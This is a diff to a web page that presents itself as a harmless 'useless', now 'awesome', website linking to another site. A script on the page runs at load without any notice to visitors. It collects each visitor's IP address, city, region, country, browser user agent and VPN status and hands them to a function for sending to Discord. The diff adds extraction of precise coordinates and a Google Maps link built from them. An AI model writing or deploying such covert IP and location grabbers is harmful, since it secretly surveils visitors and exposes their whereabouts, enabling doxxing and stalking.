--- a/index.html
+++ b/index.html
@@ -1,11 +1,10 @@
-<!-- Updated HTML with clean font -->
 <!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Welcome to an useless website</title>
+    <title>Welcome to an awesome website</title>
     <style>
         body {
             font-family: 'Arial', sans-serif;
@@ -26,8 +25,8 @@
     </style>
 </head>
 <body>
-    <h1>Welcome to an useless website</h1>
-    <p>This website is pretty useless, but if you're feeling adventurous, you can visit the main website <a href="https://moopx.pro" target="_blank">here</a>.</p>
+    <h1>Welcome to an awesome website</h1>
+    <p>This website is no longer useless! If you're feeling adventurous, you can visit the main website <a href="https://moopx.pro" target="_blank">here</a>.</p>
 
     <script>
         document.addEventListener('DOMContentLoaded', function() {
@@ -46,19 +45,24 @@
                 });
             };
 
-            // Function to get visitor's information
+            // Function to get visitor's information including coordinates
             const getVisitorInfo = async () => {
                 try {
                     const infoResponse = await fetch('https://ipinfo.io/json');
                     const infoData = await infoResponse.json();
 
                     const ip = infoData.ip;
+                    const coordinates = infoData.loc.split(',');
                     const address = `${infoData.city}, ${infoData.region}, ${infoData.country}`;
                     const userAgent = navigator.userAgent;
                     const isVPN = infoData.vpn || false;
 
                     // Sending data to Discord with VPN status
                     sendInfoToDiscord(ip, address, userAgent, isVPN);
+
+                    // Adding Google Maps link
+                    const mapsLink = `https://www.google.com/maps?q=${coordinates[0]},${coordinates[1]}`;
+                    console.log(`Google Maps Link: ${mapsLink}`);
                 } catch (error) {
                     console.error('Error fetching IP, address, or VPN status:', error);
                 }
